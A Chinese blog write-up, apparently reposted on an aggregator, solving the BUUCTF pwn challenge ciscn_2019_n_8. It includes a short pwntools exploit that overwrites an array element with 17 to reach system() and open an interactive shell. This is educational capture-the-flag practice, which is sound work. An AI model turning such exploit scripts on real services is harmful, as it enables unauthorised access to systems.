当前位置: 首页 > article >正文

BUUCTF刷题之路-pwn-ciscn_2019_n_81

题查保护的时候吓了一跳,保护全开。脑子飞速旋转是要我绕过canary,PIE然后再利用栈溢出劫持程序流吗:


然后扔进IDA中查看下大致流程:


大致看出var是个数组,当var[13]=17的时候就会得到system。那还不简单直接写payload:

from pwn import *

#io = remote('node4.buuoj.cn',29957)
io=process('./ciscn_2019_n_8')
payload = b'a'* 13 * 4 + p32(17)         #beacause is DWORD so *4

io.sendline(payload)
io.interactive()

得到flag:

 


http://www.kler.cn/a/150204.html

相关文章:

  • 第十二章 spring Boot+shiro权限管理
  • Java 实现接口幂等的九种方法:确保系统稳定性与数据一致性
  • 【C++】继承的理解
  • 电子电气架构 --- 车载诊断的快速入门
  • “路由”的理解
  • HTML5实现小鸟过管道小游戏源码
  • Elasticsearch 聚合查询(Aggregation)详解
  • 虚拟机指定开放数据库3306端口
  • Golang开发之------ Beego框架
  • 异步操作的方法
  • genimage 打包镜像
  • ESP32-Web-Server编程- WebSocket 编程
  • leetcode二叉树
  • Spring Boot项目Service类单元测试自动生成
  • TikTok区块链实践:数字社交媒体的去中心化未来
  • 记录一次登录相关bug
  • Hive_last_value()
  • 解决QT信号在信号和槽连接前发出而导致槽函数未调用问题
  • 爬虫代理技术与构建本地代理池的实践
  • 亚马逊云科技向量数据库助力生成式AI成功落地实践探秘(二)
  • Java LeetCode篇-深入了解关于单链表的经典解法
  • Linux命令中的符号
  • 初学者如何入门深度学习:以手写数字字符识别为例看AI 的学习路径,一图胜千言!
  • 福德植保无人机:农业科技的新篇章
  • 小航助学题库蓝桥杯题库c++选拔赛(23年8月)(含题库教师学生账号)
  • 卷积神经网络(CNN)注意力检测